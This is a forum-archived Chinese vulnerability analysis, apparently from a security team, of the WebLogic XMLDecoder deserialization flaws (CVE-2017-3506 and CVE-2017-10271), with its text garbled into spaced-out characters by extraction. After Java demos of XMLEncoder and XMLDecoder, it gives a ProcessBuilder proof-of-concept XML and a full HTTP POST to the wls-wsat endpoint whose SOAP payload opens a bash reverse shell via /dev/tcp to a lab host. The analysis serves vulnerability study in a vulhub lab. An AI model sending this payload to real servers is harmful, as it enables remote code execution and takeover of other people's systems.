搜索

[18229] 2020-12-12_WebLogic-XMLDecoder反序列化漏洞分析

文档创建者:s7ckTeam
浏览次数:44
最后更新:2025-01-18
2020-12-12_WebLogic-XMLDecoder反序列化漏洞分析 W e b L o g i c - X M L D e c o d e r g h t w f 0 1   H A C K   2 0 2 0 - 1 2 - 1 2 X M L E n c o d e r & X M L D e c o d e r X M L D e c o d e r / X M L E n c o d e r   J D K 1 . 4   X M L   使   X M L E n c o d e r     J a v a B e a n s   ( b e a n )   X M L     X M L D e c o d e r   使   X M L E n c o d e r   X M L J a v a B e a n s X M L E n c o d e r p a c k a g e   g h t w f 0 1 . d e m o ; i m p o r t   j a v a x . s w i n g . * ; i m p o r t   j a v a . b e a n s . X M L E n c o d e r ; i m p o r t   j a v a . i o . B u f f e r e d O u t p u t S t r e a m ; i m p o r t   j a v a . i o . F i l e N o t F o u n d E x c e p t i o n ; i m p o r t   j a v a . i o . F i l e O u t p u t S t r e a m ; p u b l i c   c l a s s   X m l E n c o d e r   {         p u b l i c   s t a t i c   v o i d   m a i n ( S t r i n g [ ]   a r g s )   t h r o w s   F i l e N o t F o u n d E x c e p t i o n   {                 X M L E n c o d e r   e   =   n e w   X M L E n c o d e r ( n e w   B u f f e r e d O u t p u t S t r e a m ( n e w   F i l e O u t p u t S t r e a m ( " r e s u l t . x m l " ) ) ) ;                 e . w r i t e O b j e c t ( n e w   J B u t t o n ( " H e l l o , x m l " ) ) ;                 e . c l o s e ( ) ;         } } J B u t t o n X M L
< ? x m l   v e r s i o n = " 1 . 0 "   e n c o d i n g = " U T F - 8 " ? > < j a v a   v e r s i o n = " 1 . 8 . 0 _ 1 8 1 "   c l a s s = " j a v a . b e a n s . X M L D e c o d e r " >   < o b j e c t   c l a s s = " j a v a x . s w i n g . J B u t t o n " >     < s t r i n g > H e l l o , x m l < / s t r i n g >   < / o b j e c t > < / j a v a > X M L D e c o d e r p a c k a g e   g h t w f 0 1 . d e m o ; i m p o r t   j a v a . b e a n s . X M L D e c o d e r ; i m p o r t   j a v a . i o . * ; p u b l i c   c l a s s   X m l E n c o d e r   {         p u b l i c   s t a t i c   v o i d   m a i n ( S t r i n g [ ]   a r g s )   t h r o w s   F i l e N o t F o u n d E x c e p t i o n   {                 X M L D e c o d e r   d   =   n e w   X M L D e c o d e r ( n e w   B u f f e r e d I n p u t S t r e a m ( n e w   F i l e I n p u t S t r e a m ( " r e s u l t . x m l " ) ) ) ;                 O b j e c t   r e s u l t   =   d . r e a d O b j e c t ( ) ;                 S y s t e m . o u t . p r i n t l n ( r e s u l t ) ;                 d . c l o s e ( ) ;         } } 使   X M L D e c o d e r     X M L     J B u t t o n   X M L s t r i n g j a v a x . s w i n g . J B u t t o n [ , 0 , 0 , 0 x 0 , i n v a l i d , a l i g n m e n t X = 0 . 0 , a l i g n m e n t Y = 0 . 5 , b o r d e r = c o m . a p p l e . l a f . A q u a B u t t o n B o r d e r $ D y n a m i c @ 1 a 6 c 5 a 9 e , f l a g s = 2 8 8 , m a x i m u m S i z e = , m i n i m u m S i z e = , p r e f e r r e d S i z e = , d e f a u l t I c o n = , d i s a b l e d I c o n = , d i s a b l e d S e l e c t e d I c o n = , m a r g i n = j a v a x . s w i n g . p l a f . I n s e t s U I R e s o u r c e [ t o p = 0 , l e f t = 2 , b o t t o m = 0 , r i g h t = 2 ] , p a i n t B o r d e r = t r u e , p a i n t F o c u s = t r u e , p r e s s e d I c o n = , r o l l o v e r E n a b l e d = f a l s e , r o l l o v e r I c o n = , r o l l o v e r S e l e c t e d I c o n = , s e l e c t e d I c o n = , t e x t = H e l l o , x m l , d e f a u l t C a p a b l e = t r u e ] h e l l o , x m l < s t r i n g > H e l l o , x m l < / s t r i n g >
o b j e c t         ( )   (     )   : < o b j e c t   c l a s s = " j a v a x . s w i n g . J B u t t o n "   m e t h o d = " n e w " >         < s t r i n g > H e l l o , x m l < / s t r i n g > < / o b j e c t > v o i d           : < s t r i n g > H e l l o , x m l < / s t r i n g > < o b j e c t > c l a s s m e t h o d n e w n e w   J B u t t o n ( " H e l l o , x m l " ) X M L v o i d m e t h o d J B u t t o n   b   =   n e w   J B u t t o n ( ) ; b . s e t T e x t ( " H e l l o ,   w o r l d " ) ; X M L
< o b j e c t   c l a s s = " j a v a x . s w i n g . J B u t t o n " >         < v o i d   m e t h o d = " s e t T e x t " >         < s t r i n g > H e l l o , x m l < / s t r i n g >         < / v o i d > < / o b j e c t > a r r a y                   : < a r r a y   c l a s s = " j a v a . l a n g . S t r i n g "   l e n g t h = " 3 " >         < v o i d   i n d e x = " 1 " >         < s t r i n g > H e l l o , x m l < / s t r i n g >     < / v o i d > < / a r r a y > X M L D e c o d e r x m l d e m o : a r r a y c l a s s v o i d i n d e x S t r i n g [ ]   s   =   n e w   S t r i n g [ 3 ] ; s [ 1 ]   =   " H e l l o , x m l " ; X M L
p a c k a g e   g h t w f 0 1 . d e m o ; i m p o r t   j a v a . b e a n s . X M L D e c o d e r ; i m p o r t   j a v a . i o . B u f f e r e d I n p u t S t r e a m ; i m p o r t   j a v a . i o . F i l e I n p u t S t r e a m ; i m p o r t   j a v a . i o . F i l e N o t F o u n d E x c e p t i o n ; p u b l i c   c l a s s   X m l D e c o d e r   {         p u b l i c   s t a t i c   v o i d   m a i n ( S t r i n g [ ]   a r g s )   t h r o w s   F i l e N o t F o u n d E x c e p t i o n   {                 X M L D e c o d e r   d   =   n e w   X M L D e c o d e r ( n e w   B u f f e r e d I n p u t S t r e a m ( n e w   F i l e I n p u t S t r e a m ( " / U s e r s / g h t w f 0 1 / p o c . x m l " ) ) ) ;                 O b j e c t   r e s u l t   =   d . r e a d O b j e c t ( ) ;                 d . c l o s e ( ) ;         } } p o c . x m l < j a v a   v e r s i o n = " 1 . 4 . 0 "   c l a s s = " j a v a . b e a n s . X M L D e c o d e r " >         < v o i d   c l a s s = " j a v a . l a n g . P r o c e s s B u i l d e r " >                 < a r r a y   c l a s s = " j a v a . l a n g . S t r i n g "   l e n g t h = " 3 " >                         < v o i d   i n d e x = " 0 " >                                 < s t r i n g > / b i n / b a s h < / s t r i n g >                         < / v o i d >                         < v o i d   i n d e x = " 1 " >                                 < s t r i n g > - c < / s t r i n g >                         < / v o i d >                         < v o i d   i n d e x = " 2 " >                                 < s t r i n g > o p e n   - a   C a l c u l a t o r < / s t r i n g >                         < / v o i d >                 < / a r r a y >                 < v o i d   m e t h o d = " s t a r t " / > < / v o i d > < / j a v a >
使   j a v a . l a n g . P r o c e s s B u i l d e r     X M L   : S t r i n g [ ]   c m d   =   n e w   S t r i n g [ 3 ] ; c m d [ 0 ]   =   " / b i n / b a s h " ; c m d [ 1 ]   =   " - c " ; c m d [ 2 ]   =   " o p e n   / S y s t e m / A p p l i c a t i o n s / C a l c u l a t o r . a p p / " ; n e w   P r o c e s s B u i l d e r ( c m d ) . s t a r t ( ) ; W e b l o g i c - X M L D e c o d e r v u l h u b d o c k e r - c o m p o s e . y m l e x p v e r s i o n :   ' 2 ' s e r v i c e s :   w e b l o g i c :       i m a g e :   v u l h u b / w e b l o g i c       p o r t s :         -   " 7 0 0 1 : 7 0 0 1 "         -   " 8 4 5 3 : 8 4 5 3 " P O S T   / w l s - w s a t / C o o r d i n a t o r P o r t T y p e   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 5 0 . 1 4 5 : 7 0 0 1 C a c h e - C o n t r o l :   m a x - a g e = 0
U p g r a d e - I n s e c u r e - R e q u e s t s :   1 U s e r - A g e n t :   M o z i l l a / 5 . 0   ( M a c i n t o s h ;   I n t e l   M a c   O S   X   1 0 _ 1 5 _ 7 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 6 . 0 . 4 2 4 0 . 1 1 1   S a f a r i / 5 3 7 . 3 6 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / a v i f , i m a g e / w e b p , i m a g e / a p n g , * / * ; q = 0 . 8 , a p p l i c a t i o n / s i g n e d - e x c h a n g e ; v = b 3 ; q = 0 . 9 A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 9 C o n t e n t - t y p e :   t e x t / x m l C o n n e c t i o n :   c l o s e C o n t e n t - L e n g t h :   6 3 9 < s o a p e n v : E n v e l o p e   x m l n s : s o a p e n v = " h t t p : / / s c h e m a s . x m l s o a p . o r g / s o a p / e n v e l o p e / " >   < s o a p e n v : H e a d e r > < w o r k : W o r k C o n t e x t   x m l n s : w o r k = " h t t p : / / b e a . c o m / 2 0 0 4 / 0 6 / s o a p / w o r k a r e a / " > < j a v a   v e r s i o n = " 1 . 4 . 0 "   c l a s s = " j a v a . b e a n s . X M L D e c o d e r " > < v o i d   c l a s s = " j a v a . l a n g . P r o c e s s B u i l d e r " > < a r r a y   c l a s s = " j a v a . l a n g . S t r i n g "   l e n g t h = " 3 " > < v o i d   i n d e x = " 0 " > < s t r i n g > / b i n / b a s h < / s t r i n g > < / v o i d > < v o i d   i n d e x = " 1 " > < s t r i n g > - c < / s t r i n g > < / v o i d > < v o i d   i n d e x = " 2 " > < s t r i n g > b a s h   - i   > &   / d e v / t c p / 1 9 2 . 1 6 8 . 5 0 . 1 4 5 / 4 4 4 4   0 > & 1 < / s t r i n g > < / v o i d > < / a r r a y > < v o i d   m e t h o d = " s t a r t " / > < / v o i d > < / j a v a > < / w o r k : W o r k C o n t e x t > < / s o a p e n v : H e a d e r > < s o a p e n v : B o d y / > < / s o a p e n v : E n v e l o p e >
4 1 5 W e b l o g i c - X M L D e c o d e r   d o c k e r - c o m p o s e . y m l     8 4 5 3   W e b l o g i c : C o n t e n t - t y p e t e x t / x m l / r o o t / O r a c l e / M i d d l e w a r e / u s e r _ p r o j e c t s / d o m a i n s / b a s e _ d o m a i n / b i n / s e t D o m a i n E n v . s h d e b u g F l a g = " t r u e " e x p o r t   d e b u g F l a g
d c o k e r W e b l o g i c J D K   M i d d l e w a r e     j a r     w a r     l i b   O r a c l e / M i d d l e w a r e / w l s e r v e r _ 1 0 . 3   I D E A J D K   l i b     L i b r a r i e s d o c k e r   c p   6 9 2 3 9 4 a 4 5 a 3 8 : / r o o t   . / w e b l o g i c c d   / U s e r s / g h t w f 0 1 / D e s k t o p / g h t w f 0 1 / v u l h u b / w e b l o g i c / C V E - 2 0 1 7 - 1 0 2 7 1 / w e b l o g i c / O r a c l e / M i d d l e w a r e m k d i r   l i b f i n d   . /   - n a m e   " * . j a r "   - e x e c   c p   { }   . / l i b /   ; f i n d   . /   - n a m e   " * . w a r "   - e x e c   c p   { }   . / l i b /   ;
  D E B U G     R e m o t e     d o c k e r     8 4 5 3 使 d e b u g C V E - 2 0 1 7 - 3 5 0 6 & C V E - 2 0 1 7 - 1 0 2 7 1 W e b L o g i c   1 0 . 3 . 6 . 0 W e b L o g i c   1 2 . 1 . 3 . 0 W e b L o g i c   1 2 . 2 . 1 . 0 W e b L o g i c   1 2 . 2 . 1 . 1 W e b L o g i c   1 2 . 2 . 1 . 2     C o n n e c t e d   t o   t h e   t a r g e t   V M ,   a d d r e s s :   ' 1 9 2 . 1 6 8 . 5 0 . 1 4 5 : 8 4 5 3 ' ,   t r a n s p o r t :   ' s o c k e t ' C V E - 2 0 1 7 - 3 5 0 6 C V E - 2 0 1 7 - 1 0 2 7 1 X M L D e c o d e r C V E - 2 0 1 7 - 3 5 0 6
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理